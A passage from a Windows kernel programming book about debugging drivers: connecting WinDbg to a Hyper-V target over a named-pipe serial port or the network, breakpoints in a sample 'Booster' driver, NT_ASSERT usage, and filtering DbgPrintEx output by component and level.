    DirBase: 140fe9000  ObjectTable: ffffa58d46a99500  HandleCount: 2633.
    Image: explorer.exe
lkd> .process /p ffffd1049e118080
Implicit process is now ffffd104`9e118080
lkd> .reload /user
Loading User Symbols
................................................................
lkd> !process ffffd1049e118080
PROCESS ffffd1049e118080
    SessionId: 1  Cid: 1780    Peb: 0076b000  ParentCid: 16d0
    DirBase: 362ea5000  ObjectTable: ffffa58d45891680  HandleCount: 3223.
    Image: explorer.exe
...
        THREAD ffffd1049e47c400  Cid 1780.1754  Teb: 000000000078c000 Win32Thread: ffffd1049e5da7a0 WAIT: (WrQueue) UserMode Alertable
            ffffd1049e076480  QueueObject
        IRP List:
            ffffd1049fbea9b0: (0006,0478) Flags: 00060000  Mdl: 00000000
            ffffd1049efd6aa0: (0006,0478) Flags: 00060000  Mdl: 00000000
            ffffd1049efee010: (0006,0478) Flags: 00060000  Mdl: 00000000
            ffffd1049f3ef8a0: (0006,0478) Flags: 00060000  Mdl: 00000000
            Not impersonating
            DeviceMap                 ffffa58d41354230
            Owning Process            ffffd1049e118080       Image:         explorer.exe
            Attached Process          N/A            Image:         N/A
            Wait Start TickCount      3921033        Ticks: 7089 (0:00:01:50.765)
            Context Switch Count      16410          IdealProcessor: 5
            UserTime                  00:00:00.265
            KernelTime                00:00:00.234
            Win32 Start Address ntdll!TppWorkerThread (0x00007ffb37d96830)
            Stack Init ffffbe88b5fc7630 Current ffffbe88b5fc6d20
            Base ffffbe88b5fc8000 Limit ffffbe88b5fc1000 Call 0000000000000000
            Priority 9 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
            Child-SP          RetAddr           Call Site
            ffffbe88`b5fc6d60 fffff802`07c5dc17 nt!KiSwapContext+0x76
            ffffbe88`b5fc6ea0 fffff802`07c5fac9 nt!KiSwapThread+0x3a7
            ffffbe88`b5fc6f80 fffff802`07c62526 nt!KiCommitThreadWait+0x159
            ffffbe88`b5fc7020 fffff802`07c61f38 nt!KeRemoveQueueEx+0x2b6
            ffffbe88`b5fc70d0 fffff802`07c6479c nt!IoRemoveIoCompletion+0x98
            ffffbe88`b5fc71f0 fffff802`07e25075 nt!NtWaitForWorkViaWorkerFactory+0x39c
            ffffbe88`b5fc7430 00007ffb`37e26e84 nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffbe88`b5fc74a0)
            00000000`03def858 00007ffb`37d96b0f ntdll!NtWaitForWorkViaWorkerFactory+0x14
            00000000`03def860 00007ffb`367a54e0 ntdll!TppWorkerThread+0x2df
            00000000`03defb50 00007ffb`37d8485b KERNEL32!BaseThreadInitThunk+0x10
            00000000`03defb80 00000000`00000000 ntdll!RtlUserThreadStart+0x2b
...
Notice the thread above has issued several IRPs as well. We’ll discuss this in greater detail in chapter 7.
A thread’s information can be viewed separately with the !thread command and the address of the
thread. Check the debugger documentation for the description of the various pieces of information
displayed by this command.
Other generally useful/interesting commands in kernel-mode debugging include:
• !pcr - display the Processor Control Region (PCR) for a processor specified as an additional index
(processor 0 is displayed by default if no index is specified).
• !vm - display memory statistics for the system and processes.
• !running - displays information on threads running on all processors on the system.
We’ll look at more specific commands useful for debugging drivers in subsequent chapters.
Full Kernel Debugging
Full kernel debugging requires configuration on the host and target. In this section, we’ll see how to
configure a virtual machine as a target for kernel debugging. This is the recommended and most convenient
setup for kernel driver work (when not developing device drivers for hardware). We’ll go through the
steps for configuring a Hyper-V virtual machine. If you’re using a different virtualization technology (e.g.
VMWare or VirtualBox), please consult that product’s documentation or the web for the correct procedure
to get the same results.
The target and host machines must communicate using some communication medium. There are several
options available. The fastest communication option is to use the network. Unfortunately, this requires the
host and target to run Windows 8 at a minimum. Since Windows 7 is still a viable target, there is another
convenient option - the COM (serial) port, which can be exposed as a named pipe to the host machine. All
virtualization platforms allow redirecting a virtual serial port to a named pipe on the host. We’ll look at
both options.
Just like Local Kernel Debugging, the target machine cannot use Secure Boot. With full kernel
debugging, there is no workaround.
Using a Virtual Serial Port
In this section, we’ll configure the target and host to use a virtual COM port exposed as a named pipe to
the host. In the next section, we’ll configure kernel debugging using the network.
Configuring the Target
The target VM must be configured for kernel debugging, similar to local kernel debugging, but with the
added connection media set to a virtual serial port on that machine.
One way to do the configuration is using bcdedit in an elevated command window:
bcdedit /debug on
bcdedit /dbgsettings serial debugport:1 baudrate:115200
Change the debug port number according to the actual virtual serial port number (typically 1).
The VM must be restarted for these configurations to take effect. Before you do that, we can map the serial
port to a named pipe. Here is the procedure for Hyper-V virtual machines:
If the Hyper-V VM is Generation 1 (older), there is a simple UI in the VM’s settings to do the configuration.
Use the Add Hardware option to add a serial port if there are none defined. Then configure the serial port
to be mapped to a named port of your choosing. Figure 5-6 shows this dialog.
Figure 5-6: Mapping serial port to named pipe for Hyper-V Gen-1 VM
For Generation 2 VMs, no UI is currently available. To configure this, make sure the VM is shut down, and
open an elevated PowerShell window.
Type the following to set a serial port mapped to a named pipe:
PS C:\>Set-VMComPort myvmname -Number 1 -Path "\\.\pipe\debug"
Change the VM name appropriately and the COM port number as set inside the VM earlier with bcdedit.
Make sure the pipe path is unique.
You can verify the settings are as expected with Get-VMComPort:
PS C:\>Get-VMComPort myvmname

VMName   Name  Path
------   ----  ----
myvmname COM 1 \\.\pipe\debug
myvmname COM 2
You can boot the VM - the target is now ready.
Configuring the Host
The kernel debugger must be properly configured to connect with the VM on the same serial port mapped
to the same named pipe exposed on the host.
Launch the kernel debugger elevated, and select File / Attach To Kernel. Navigate to the COM tab. Fill in
the correct details as they were set on the target. Figure 5-7 shows what these settings look like.
Figure 5-7: Setting host COM port configuration
Click OK. The debugger should attach to the target. If it does not, click the Break toolbar button. Here is
some typical output:
Microsoft (R) Windows Debugger Version 10.0.18317.1001 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

Opened \\.\pipe\debug
Waiting to reconnect...
Connected to Windows 10 18362 x64 target at (Sun Apr 21 11:28:11.300 2019 (UTC + 3:00)), ptr64 TRUE
Kernel Debugger connection established.
(Initial Breakpoint requested)

************* Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 10 Kernel Version 18362 MP (4 procs) Free x64
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 18362.1.amd64fre.19h1_release.190318-1202
Machine Name:
Kernel base = 0xfffff801`36a09000 PsLoadedModuleList = 0xfffff801`36e4c2d0
Debug session time: Sun Apr 21 11:28:09.669 2019 (UTC + 3:00)
System Uptime: 1 days 0:12:28.864
Break instruction exception - code 80000003 (first chance)
*******************************************************************************
*                                                                             *
*   You are seeing this message because you pressed either                    *
*       CTRL+C (if you run console kernel debugger) or,                       *
*       CTRL+BREAK (if you run GUI kernel debugger),                          *
*   on your debugger machine's keyboard.                                      *
*                                                                             *
*                   THIS IS NOT A BUG OR A SYSTEM CRASH                       *
*                                                                             *
* If you did not intend to break into the debugger, press the "g" key, then   *
* press the "Enter" key now. This message might immediately reappear. If it   *
* does, press "g" and "Enter" again.                                          *
*                                                                             *
*******************************************************************************
nt!DbgBreakPointWithStatus:
fffff801`36bcd580 cc              int     3
Note the prompt has an index and the word kd. The index is the current processor that induced the break.
At this point, the target VM is completely frozen. You can now debug normally, bearing in mind anytime
you break somewhere, the entire machine is frozen.
Using the Network
In this section, we’ll configure full kernel debugging using the network, focusing on the differences
compared to the virtual COM port setup.
Configuring the Target
On the target machine, running with an elevated command window, configure network debugging using
the following format with bcdedit:
bcdedit /dbgsettings net hostip:<ip> port:<port> [key:<key>]
The hostip must be the IP address of the host accessible from the target. port can be any available port on
the host, but the documentation recommends working with port 50000 and up. The key is optional. If you
don’t specify it, the command generates a random key. For example:
c:/>bcdedit /dbgsettings net hostip:10.100.102.53 port:51111
Key=1rhvit77hdpv7.rxgwjdvhxj7v.312gs2roip4sf.3w25wrjeocobh
The alternative is to provide your own key for simplicity, which must be in the format a.b.c.d. This is
acceptable from a security standpoint when working with local virtual machines:
c:/>bcdedit /dbgsettings net hostip:10.100.102.53 port:51111 key:1.2.3.4
Key=1.2.3.4
You can always display the current debug configuration with /dbgsettings alone:
c:\>bcdedit /dbgsettings
key                     1.2.3.4
debugtype               NET
hostip                  10.100.102.53
port                    51111
dhcp                    Yes
The operation completed successfully.
Finally, restart the target.
Configuring the Host
On the host machine, launch the debugger and select the File / Attach To Kernel option (or File / Kernel
Debug… in the classic WinDbg). Navigate to the NET tab, and enter the information corresponding to your
settings (figure 5-8).
Figure 5-8: Attach to kernel dialog
You may need to click the Break button (possibly multiple times) to establish a connection. More information and troubleshooting tips can be found at https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-a-network-debugging-connection.
Kernel Driver Debugging Tutorial
Once host and target are connected, debugging can begin. We will use the Booster driver we developed in
chapter 4 to demonstrate full kernel debugging.
Install (but don’t load) the driver on the target as was done in chapter 4. Make sure you copy the driver’s
PDB file alongside the driver SYS file itself. This simplifies getting correct symbols for the driver.
Let’s set a breakpoint in DriverEntry. We cannot load the driver just yet because that would cause
DriverEntry to execute, and we’ll miss the chance to set a breakpoint there. Since the driver is not
loaded yet, we can use the bu command (unresolved breakpoint) to set a future breakpoint. Break into the
target if it’s currently running, and type the following command in the debugger:
0: kd> bu booster!driverentry
0: kd> bl
     0 e Disable Clear  u                        0001 (0001) (booster!driverentry)
The breakpoint is unresolved at this point, since our module (driver) is not yet loaded. The debugger will
re-evaluate the breakpoint any time a new module is loaded.
Issue the g command to let the target continue execution, and load the driver with sc start booster
(assuming the driver’s name is booster). If all goes well, the breakpoint should hit, and the source file
should open automatically, showing the following output in the command window:
0: kd> g
Breakpoint 0 hit
Booster!DriverEntry:
fffff802`13da11c0 4889542410      mov     qword ptr [rsp+10h],rdx
The index on the left of the colon is the CPU index running the code when the breakpoint hit
(CPU 0 in the above output).
Figure 5-9 shows a screenshot of WinDbg Preview source window automatically opening and the correct
line marked. The Locals window is also shown as expected.
Figure 5-9: Breakpoint hit in DriverEntry
At this point, you can step over source lines, look at variables in the Locals window, and even add
expressions to the Watch window. You can also change values using the Locals window just like you
would normally do with other debuggers.
The Command window is still available as always, but some operations are just easier with the GUI. Setting
breakpoints, for example, can be done with the normal bp command, but you can simply open a source
file (if it’s not already open), go to the line where you want to set a breakpoint, and hit F9 or click the
appropriate button on the toolbar. Either way, the bp command will be executed in the Command window.
The Breakpoints window can serve as a quick overview of the currently set breakpoints.
Issue the k command to see how DriverEntry is being invoked:
0: kd> k
 # Child-SP          RetAddr           Call Site
00 ffffbe88`b3f4f138 fffff802`13da5020 Booster!DriverEntry [D:\Dev\windowskernelprogrammingbook2e\Chapter04\Booster\Booster.cpp @ 9]
01 ffffbe88`b3f4f140 fffff802`081cafc0 Booster!GsDriverEntry+0x20 [minkernel\tools\gs_support\kmode\gs_support.c @ 128]
02 ffffbe88`b3f4f170 fffff802`080858e2 nt!PnpCallDriverEntry+0x4c
03 ffffbe88`b3f4f1d0 fffff802`081aeab7 nt!IopLoadDriver+0x8ba
04 ffffbe88`b3f4f380 fffff802`07c48aaf nt!IopLoadUnloadDriver+0x57
05 ffffbe88`b3f4f3c0 fffff802`07d5b615 nt!ExpWorkerThread+0x14f
06 ffffbe88`b3f4f5b0 fffff802`07e16c24 nt!PspSystemThreadStartup+0x55
07 ffffbe88`b3f4f600 00000000`00000000 nt!KiStartSystemThread+0x34
If breakpoints fail to hit, it may be a symbols issue. Execute the .reload command and see
if the issues are resolved. Setting breakpoints in user space is also possible, but first execute
.reload /user to force the debugger to load user-mode symbols.
It may be the case that a breakpoint should hit only when a specific process is the one executing the code.
This can be done by adding the /p switch to a breakpoint. In the following example, a breakpoint is set
only if the process is a specific explorer.exe:
0: kd> !process 0 0 explorer.exe
PROCESS ffffd1049e118080
    SessionId: 1  Cid: 1780    Peb: 0076b000  ParentCid: 16d0
    DirBase: 362ea5000  ObjectTable: ffffa58d45891680  HandleCount: 3918.
    Image: explorer.exe

PROCESS ffffd104a14e2080
    SessionId: 1  Cid: 2548    Peb: 005c1000  ParentCid: 0314
    DirBase: 140fe9000  ObjectTable: ffffa58d46a99500  HandleCount: 4524.
    Image: explorer.exe
0: kd> bp /p ffffd1049e118080 booster!boosterwrite
0: kd> bl
     0 e Disable Clear  fffff802`13da11c0 [D:\Dev\Chapter04\Booster\Booster.cpp @ 9]     0001 (0001) Booster!DriverEntry
     1 e Disable Clear  fffff802`13da1090 [D:\Dev\Chapter04\Booster\Booster.cpp @ 61]    0001 (0001) Booster!BoosterWrite
         Match process data ffffd104`9e118080
Let’s set a normal breakpoint somewhere in the BoosterWrite function, by hitting F9 on the line in
source view, as shown in figure 5-10 (the earlier conditional breakpoint is shown as well).
Figure 5-10: Breakpoint set in BoosterWrite
Listing the breakpoints reflects the new breakpoint with the offset calculated by the debugger:
0: kd> bl
     0 e Disable Clear  fffff802`13da11c0 [D:\Dev\Chapter04\Booster\Booster.cpp @ 9]     0001 (0001) Booster!DriverEntry
     1 e Disable Clear  fffff802`13da1090 [D:\Dev\Chapter04\Booster\Booster.cpp @ 61]    0001 (0001) Booster!BoosterWrite
         Match process data ffffd104`9e118080
     2 e Disable Clear  fffff802`13da10af [D:\Dev\Chapter04\Booster\Booster.cpp @ 65]    0001 (0001) Booster!BoosterWrite+0x1f
Enter the g command to release the target, and then run the boost application with some thread ID and
priority:
c:\Test> boost 5964 30
The breakpoint within BoosterWrite should hit:
Breakpoint 2 hit
Booster!BoosterWrite+0x1f:
fffff802`13da10af 488b4c2468      mov     rcx,qword ptr [rsp+68h]
You can continue debugging normally, looking at local variables, stepping over/into functions, etc.
Finally, if you would like to disconnect from the target, enter the .detach command. If it does not resume
the target, click the Stop Debugging toolbar button (you may need to click it multiple times).
Asserts and Tracing
Although using a debugger is sometimes necessary, good coding practices can go a long way toward making a debugger less needed. In this section we'll examine asserts and powerful logging that is suitable for both Debug and Release builds of a driver.
Asserts
Just like in user mode, asserts can be used to verify that certain assumptions are correct. An invalid
assumption means something is very wrong, so it’s best to stop. The WDK header provides the NT_ASSERT
macro for this purpose.
NT_ASSERT accepts something that can be converted to a Boolean value. If the result is non-zero (true),
execution continues. Otherwise, the assertion has failed, and the system takes one of the following actions:
• If a kernel debugger is attached, an assertion failure breakpoint is raised, allowing debugging the
assertion.
• If a kernel debugger is not attached, the system bugchecks. The resulting dump file will pinpoint
the exact line where the assertion has failed.
Here is a simple assert usage added to the DriverEntry function in the Booster driver from chapter 4:
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
    DriverObject->DriverUnload = BoosterUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = BoosterCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] = BoosterCreateClose;
    DriverObject->MajorFunction[IRP_MJ_WRITE] = BoosterWrite;

    UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\Booster");
    PDEVICE_OBJECT DeviceObject;
    NTSTATUS status = IoCreateDevice(
        DriverObject,          // our driver object
        0,                     // no need for extra bytes
        &devName,              // the device name
        FILE_DEVICE_UNKNOWN,   // device type
        0,                     // characteristics flags
        FALSE,                 // not exclusive
        &DeviceObject);        // the resulting pointer
    if (!NT_SUCCESS(status)) {
        KdPrint(("Failed to create device object (0x%08X)\n", status));
        return status;
    }
    NT_ASSERT(DeviceObject);

    UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\Booster");
    status = IoCreateSymbolicLink(&symLink, &devName);
    if (!NT_SUCCESS(status)) {
        KdPrint(("Failed to create symbolic link (0x%08X)\n", status));
        IoDeleteDevice(DeviceObject);
        return status;
    }
    NT_ASSERT(NT_SUCCESS(status));

    return STATUS_SUCCESS;
}
The first assert makes sure the device object pointer is non-NULL:
NT_ASSERT(DeviceObject);
The second makes sure the status at the end of DriverEntry is a successful one:
NT_ASSERT(NT_SUCCESS(status));
NT_ASSERT only compiles its expression in Debug builds, which makes using asserts practically free from
a performance standpoint, as these will not be part of the final released driver. This also means you need
to be careful that the expression inside NT_ASSERT has no side effects. For example, the following code
is wrong:
NT_ASSERT(NT_SUCCESS(IoCreateSymbolicLink(...)));
This is because the call to IoCreateSymbolicLink will disappear completely in a Release build. The
correct way to assert would be something like the following:
status = IoCreateSymbolicLink(...);
NT_ASSERT(NT_SUCCESS(status));
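The side-effect pitfall can be demonstrated with a small user-mode sketch. Everything here is a hypothetical stand-in (MY_ASSERT for NT_ASSERT, the RELEASE_BUILD switch for a Release configuration, DoWork for a call with a side effect, such as IoCreateSymbolicLink): when the assert macro compiles away, any call embedded in its expression disappears with it.

```cpp
#include <cstdlib>

// Simulate a Release build, where the assert macro discards its expression.
#define RELEASE_BUILD

#ifdef RELEASE_BUILD
    #define MY_ASSERT(expr) ((void)0)                        // expression vanishes
#else
    #define MY_ASSERT(expr) ((expr) ? (void)0 : std::abort())
#endif

static int g_callCount = 0;

// Stand-in for a call with a side effect (think IoCreateSymbolicLink)
bool DoWork() { ++g_callCount; return true; }

// WRONG: in a Release build, DoWork() is never called
int WrongPattern() {
    MY_ASSERT(DoWork());
    return g_callCount;
}

// RIGHT: call first, then assert on the result
int RightPattern() {
    bool ok = DoWork();
    MY_ASSERT(ok);
    (void)ok;    // avoid an unused-variable warning in Release
    return g_callCount;
}
```

With RELEASE_BUILD defined, WrongPattern never invokes DoWork, mirroring how the symbolic link would silently never be created in the wrong kernel code above.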
Asserts are useful and should be used liberally because they only have an effect in Debug builds.
Extended DbgPrint
We’ve seen usage of the DbgPrint function (and the KdPrint macro) to generate output that can be
viewed with the kernel debugger or a comparable tool, such as DebugView. This works, and is simple to
use, but has some significant downsides:
• All the output is generated - there is no easy way to filter it to show only some messages (such
as errors and warnings). This is partially mitigated with the extended DbgPrintEx function
described in the next paragraph.
• DbgPrint(Ex) is a relatively slow function, which is why it’s mostly used with KdPrint so that
the overhead is removed in Release builds. But output in Release builds could be very important.
Some bugs may only happen in Release builds, where good output could be useful for diagnosing
issues.
• There is no semantic meaning associated with DbgPrint - it’s just text. There is no way to add
values with property name or type information.
• There is no built-in way to save the output to a file rather than just see it in the debugger. If you
are using DebugView, it can save its output to a file.
The output from DbgPrint(Ex) is limited to 512 bytes. Any remaining bytes are lost.
The DbgPrintEx function (and the associated KdPrintEx macro) were added to provide some filtering
support for DbgPrint output:
ULONG DbgPrintEx (
    _In_ ULONG ComponentId,
    _In_ ULONG Level,
    _In_z_ _Printf_format_string_ PCSTR Format,
    ...);    // any number of args
A list of component IDs is present in the <dpfilter.h> header (common to user and kernel mode), currently
containing 155 valid values (0 to 154). Most values are used by the kernel and Microsoft drivers, except for
a handful that are meant to be used by third-party drivers:
• DPFLTR_IHVVIDEO_ID (78) - for video drivers.
• DPFLTR_IHVAUDIO_ID (79) - for audio drivers.
• DPFLTR_IHVNETWORK_ID (80) - for network drivers.
• DPFLTR_IHVSTREAMING_ID (81) - for streaming drivers.
• DPFLTR_IHVBUS_ID (82) - for bus drivers.
• DPFLTR_IHVDRIVER_ID (77) - for all other drivers.
• DPFLTR_DEFAULT_ID (101) - used with DbgPrint or if an illegal component number is used.
For most drivers, the DPFLTR_IHVDRIVER_ID component ID should be used.
The Level parameter indicates the severity of the message (error, warning, information, etc.), but can
technically mean anything you want. The interpretation of this value depends on whether the value is
between 0 and 31, or greater than 31:
• 0 to 31 - the level is a single bit formed by the expression 1 << Level. For example, if Level is 5,
then the value is 32.
• Anything greater than 31 - the value is used as is.
<dpfilter.h> defines a few constants that can be used as is for Level:
#define DPFLTR_ERROR_LEVEL      0
#define DPFLTR_WARNING_LEVEL    1
#define DPFLTR_TRACE_LEVEL      2
#define DPFLTR_INFO_LEVEL       3
You can define more (or different) values as needed. The final result of whether the output will make its
way to its destination depends on the component ID, the bit mask formed by the Level argument, and on
a global mask read from the Debug Print Filter Registry key at system startup. Since the Debug Print Filter
key does not exist by default, there is a default value for all component IDs, which is zero. This means that
the actual level value is 1 (1 << 0). The output will go through if either of the following conditions is true
(value is the value specified by the Level argument to DbgPrintEx):
• If value & (Debug print Filter value for that component) is non-zero, the output
goes through. With the default, it’s (value & 1) != 0.
• If the result of the value ANDed with the Level of the ComponentId is non-zero, the output goes
through.
If neither is true, the output is dropped.
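As a rough illustration, the level interpretation and the two pass conditions can be modeled in a few lines of portable C++. The function names here are made up for this sketch; the real logic lives inside the kernel's DbgPrintEx implementation.

```cpp
#include <cstdint>

// Levels 0..31 become single bits; larger values are used as-is.
uint32_t LevelToMask(uint32_t level) {
    return level < 32 ? (1u << level) : level;
}

// Output goes through if the level mask intersects either the global
// Debug Print Filter value or the component's own mask.
bool ShouldOutput(uint32_t level, uint32_t filterValue, uint32_t componentMask) {
    const uint32_t mask = LevelToMask(level);
    return (mask & filterValue) != 0 || (mask & componentMask) != 0;
}
```

With the defaults (filter value 1, component mask 0), only DPFLTR_ERROR_LEVEL output passes, which matches the behavior described above.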
Setting the component ID level can be done in one of three ways:
• Using the Debug Print Filter key under HKLM\System\CCS\Control\Session Manager. DWORD values
can be specified where their name is the macro name of a component ID without the prefix or suffix.
For example, for DPFLTR_IHVVIDEO_ID, you would set the name to “IHVVIDEO”.
• If a kernel debugger is connected, the level of a component can be changed during debugging. For
example, the following command changes the level of DPFLTR_IHVVIDEO_ID to 0x1ff:
ed Kd_IHVVIDEO_Mask 0x1ff
The Debug Print Filter value can also be changed with the kernel debugger by using the global
kernel variable Kd_WIN2000_Mask.
• The last option is to make the change through the NtSetDebugFilterState native API. It's
undocumented, but it may be useful in practice. The Dbgkflt tool, available in the Tools folder in
the book's samples repository, makes use of this API (and its query counterpart, NtQueryDebugFilterState),
so that changes can be made even if a kernel debugger is not attached.
If NtSetDebugFilterState is called from user mode, the caller must have the Debug privilege in
its token. Since administrators have this privilege by default (but not non-admin users), you must run
dbgkflt from an elevated command window for the change to succeed.
The kernel-mode APIs provided by <wdm.h> are DbgQueryDebugFilterState and
DbgSetDebugFilterState. These are still undocumented, but at least their declaration is
available. They use the same parameters and return type as their native counterparts. This means
you can call these APIs from the driver itself if desired (perhaps based on configuration read
from the Registry).
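For reference, the Registry option described above might look like the following .reg fragment (the value name follows the convention stated earlier; the mask 0xF, enabling the first four levels, is just an example). Since the key is read at system startup, a reboot is needed for it to take effect.

```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter]
"IHVDRIVER"=dword:0000000f
```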
Using Dbgkflt
Running Dbgkflt with no arguments shows its usage.
To query the effective level of a given component, add the component name (without the prefix or suffix).
For example:
dbgkflt default
This returns the effective bits for the DPFLTR_DEFAULT_ID component. To change the value to
something else, specify the value you want. It’s always ORed with 0x80000000 so that the bits you
specify are directly used, rather than interpreting numbers lower than 32 as (1 << number). For
example, the following sets the first 4 bits for the DEFAULT component:
dbgkflt default 0xf
DbgPrint is just a shortcut that calls DbgPrintEx with the DPFLTR_DEFAULT_ID component like so
(this is conceptual and will not compile):
ULONG DbgPrint (PCSTR Format, arguments) {
return DbgPrintEx(DPFLTR_DEFAULT_ID, DPFLTR_INFO_LEVEL, Format, arguments);
}
This explains why the DWORD named DEFAULT with a value of 8 (1 << DPFLTR_INFO_LEVEL) is the
value to write in the Registry to get DbgPrint output to go through.
Given the above details, a driver can use DbgPrintEx (or the KdPrintEx macro) to specify different
levels so that output can be filtered as needed. Each call, however, may be somewhat verbose. For example:
DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
"Booster: DriverEntry called. Registry Path: %wZ\n", RegistryPath);
Obviously, we might prefer a simpler function that always uses DPFLTR_IHVDRIVER_ID (the one that
should be used for generic third-party drivers), like so:
Log(DPFLTR_INFO_LEVEL,
"Booster: DriverEntry called. Registry Path: %wZ\n", RegistryPath);
We can go even further by defining specific functions that use a log level implicitly:
LogInfo("Booster: DriverEntry called. Registry Path: %wZ\n", RegistryPath);
Here is an example where we define several levels to be used, by creating an enumeration (there is no
requirement to use these specific values):
enum class LogLevel {
    Error = 0,
    Warning,
    Information,
    Debug,
    Verbose
};
Each value is associated with a small number (below 32), so that the values are interpreted as powers of
two by DbgPrintEx. Now we can define functions like the following:
ULONG Log(LogLevel level, PCSTR format, ...);
ULONG LogError(PCSTR format, ...);
ULONG LogWarning(PCSTR format, ...);
ULONG LogInfo(PCSTR format, ...);
ULONG LogDebug(PCSTR format, ...);
and so on. Log is the most generic function, while the others use a predefined log level. Here is the
implementation of the first two functions:
#include <stdarg.h>

ULONG Log(LogLevel level, PCSTR format, ...) {
    va_list list;
    va_start(list, format);
    return vDbgPrintEx(DPFLTR_IHVDRIVER_ID,
        static_cast<ULONG>(level), format, list);
}

ULONG LogError(PCSTR format, ...) {
    va_list list;
    va_start(list, format);
    return vDbgPrintEx(DPFLTR_IHVDRIVER_ID,
        static_cast<ULONG>(LogLevel::Error), format, list);
}
The use of static_cast in the above code is required in C++, as scoped enums don’t
automatically convert to integers. You can use a C-style cast instead, if you prefer. If you’re
using pure C, change the scoped enum to a standard enum (remove the class keyword).
The return value from the various DbgPrint variants is typed as a ULONG, but is in fact a
standard NTSTATUS.
The implementation uses the classic C variable arguments ellipsis (...) and implements these as you
would in standard C. The implementation calls vDbgPrintEx that accepts a va_list, which is necessary
for this to work correctly.
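The forwarding pattern itself is plain C and can be tried in user mode. Here is a sketch with vsnprintf standing in for vDbgPrintEx (LogToBuffer is a made-up name for illustration):

```cpp
#include <cstdarg>
#include <cstdio>
#include <cstring>

// User-mode analog of the Log wrappers: the ellipsis arguments are captured
// into a va_list and forwarded to a v-variant, exactly as Log forwards to
// vDbgPrintEx in the driver.
int LogToBuffer(char* buf, std::size_t size, const char* format, ...) {
    va_list list;
    va_start(list, format);
    int n = std::vsnprintf(buf, size, format, list);  // the va_list-accepting variant
    va_end(list);
    return n;
}
```

Trying to pass the ellipsis on directly does not compile; the va_list indirection is what makes the wrapper possible.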
It’s possible to create something more elaborate using the C++ variadic template feature. This
is left as an exercise to the interested (and enthusiastic) reader.
The above code can be found in the Booster2 project, part of the samples for this chapter. As part of that
project, here are a few examples where these functions are used:
// in DriverEntry
Log(LogLevel::Information, "Booster2: DriverEntry called. Registry Path: %wZ\n"\
,
RegistryPath);
// unload routine
LogInfo("Booster2: unload called\n");
// when an error is encountered creating a device object
LogError("Failed to create device object (0x%08X)\n", status);
// error locating thread ID
LogError("Failed to locate thread %u (0x%X)\n",
data->ThreadId, status);
// success in changing thread priority
LogInfo("Priority for thread %u changed from %d to %d\n",
data->ThreadId, oldPriority, data->Priority);
Other Debugging Functions
The previous section used vDbgPrintEx, defined like so:
ULONG vDbgPrintEx(
_In_ ULONG ComponentId,
_In_ ULONG Level,
_In_z_ PCCH Format,
_In_ va_list arglist);
It’s identical to DbgPrintEx, except its last argument is an already constructed va_list. A wrapper
macro exists as well - vKdPrintEx (compiled in Debug builds only).
Lastly, there is yet another extended function for printing - vDbgPrintExWithPrefix:
ULONG vDbgPrintExWithPrefix (
_In_z_ PCCH Prefix,
_In_ ULONG ComponentId,
_In_ ULONG Level,
_In_z_ PCCH Format,
_In_ va_list arglist);
It adds a prefix (first parameter) to the output. This is useful to distinguish our driver from other drivers
using the same functions. It also allows easy filtering in tools such as DebugView. For example, this code
snippet shown earlier uses an explicit prefix:
LogInfo("Booster2: unload called\n");
We can define one as a macro, and use it as the first word in any output like so:
#define DRIVER_PREFIX "Booster2: "
LogInfo(DRIVER_PREFIX "unload called\n");
This works, but it would be nicer to add the prefix to every call automatically, by calling
vDbgPrintExWithPrefix instead of vDbgPrintEx in the Log implementations. For example:
ULONG Log(LogLevel level, PCSTR format, ...) {
    va_list list;
    va_start(list, format);
    return vDbgPrintExWithPrefix("Booster2", DPFLTR_IHVDRIVER_ID,
        static_cast<ULONG>(level), format, list);
}
As an exercise, complete the implementation of the remaining Log function variants.
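As a sketch of what the completed set might look like, here is a user-mode analog where each variant forwards to one shared worker that prepends the prefix. The names mirror the driver's Log functions, but vsnprintf stands in for vDbgPrintExWithPrefix, and the globals exist only so the sketch is observable:

```cpp
#include <cstdarg>
#include <cstdio>
#include <cstring>

enum class LogLevel { Error = 0, Warning, Information, Debug, Verbose };

// Captured output, so the sketch can be inspected without a debugger.
static char g_lastLine[256];
static LogLevel g_lastLevel = LogLevel::Verbose;

// Shared worker: prepends the prefix, then formats - the role played by
// vDbgPrintExWithPrefix in the driver.
int LogV(LogLevel level, const char* format, va_list list) {
    g_lastLevel = level;
    int n = std::snprintf(g_lastLine, sizeof(g_lastLine), "Booster2: ");
    return n + std::vsnprintf(g_lastLine + n, sizeof(g_lastLine) - n, format, list);
}

int LogError(const char* format, ...) {
    va_list list;
    va_start(list, format);
    int n = LogV(LogLevel::Error, format, list);
    va_end(list);
    return n;
}

int LogWarning(const char* format, ...) {
    va_list list;
    va_start(list, format);
    int n = LogV(LogLevel::Warning, format, list);
    va_end(list);
    return n;
}
```

LogInfo, LogDebug, and a generic Log follow the same shape, changing only the level passed to the worker.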
Trace Logging
Using DbgPrint and its variants is convenient enough but, as discussed earlier, has some drawbacks.
Trace logging is a powerful alternative (or complement) that uses Event Tracing for Windows (ETW)
for logging purposes; output can be captured live or saved to a log file. ETW has the additional benefits
of being performant (it can log thousands of events per second without any noticeable delay), and it
carries semantic information not available with the simple strings generated by the DbgPrint functions.
Trace logging can be used in exactly the same way in user mode as well.
ETW is beyond the scope of this book. You can find more information in the official
documentation or in my book “Windows 10 System Programming, Part 2”.
To get started with trace logging, an ETW provider has to be defined. Contrary to "classic" ETW, no
provider registration is necessary, as trace logging ensures the event metadata is part of the logged
information, and as such is self-contained.
A provider must have a unique GUID. You can generate one with the Create GUID tool available with
